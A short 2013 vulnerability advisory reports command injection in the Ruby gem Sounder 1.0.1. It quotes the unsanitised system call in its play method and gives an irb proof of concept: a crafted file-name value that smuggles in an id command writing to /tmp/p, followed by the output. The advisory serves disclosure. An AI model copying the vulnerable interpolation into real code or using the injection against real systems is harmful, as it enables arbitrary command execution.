Command Injection in Ruby Gem Sounder 1.0.1

8/10/2013
Larry W. Cashdollar
@_larry0

https://rubygems.org/gems/sounder

Sounder is a ruby gem API for Mac OSX's afplay command.

From lib/sounder/sound.rb:

def play
  system %{/usr/bin/afplay "#{@file}" &}
end

PoC:

irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0>  system %{/bin/echo "#{@file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0> 

larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)

Author Notified: 8/9/2013